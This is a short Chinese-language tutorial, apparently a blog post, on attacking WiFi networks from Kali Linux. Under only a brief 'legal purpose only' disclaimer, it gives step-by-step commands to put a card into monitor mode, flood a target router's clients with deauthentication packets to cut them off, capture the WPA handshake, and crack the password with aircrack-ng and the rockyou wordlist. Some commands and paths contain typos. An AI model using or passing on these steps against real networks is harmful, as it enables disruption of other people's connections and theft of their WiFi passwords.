基于Kali的WiFi攻击
仅限于合法用途,责任自负
Legal purpose only, do it at your own risk.
准备
- 检查网卡情况
在终端输入 ifconfig
, 如果看到 wlan0
, 就进行下一步。
- 启动监控模式
用下面的命令启动设备:
1 | arimon-ng start wlan0 |
然后在ifconfig
的输出中,你就能看到名叫wlan0mon
的设备。然后输入
1 | airodump-ng wlan0mon |
来启动监听。用下面的指令停止监听:
1 | airmon-ng stop wlan0mon |
断网攻击
扫出来目标设备之后,用ctrl+c
停止扫描,然后再开个终端,输入
1 | aireplay-ng -0 0 -a [BSSID] wlan0mon |
然后回来这个终端,输入
1 | airodump-ng -c [CH] --bssid [BSSID] -w ~/ wlan0mon |
然后连接那个路由器WiFi的设备应该就会断联了。
破解密码
当你捕捉到这样的握手包 WPA handshake: [PACKAGE]
时, Ctrl+c
停止指令
然后输入
1 | aircrack-ng -a2 -b [PACKAGE] -w [PATH-TO-PASS-DICTIONARY] ~/*.cap |
Kali的自带字典一般在这: /fs/usr/share/wordlists/rockyou.txt.gz
. 解压,然后把rockyou.txt
的路径替换到上边,回车。然后应该就能获取到密码了。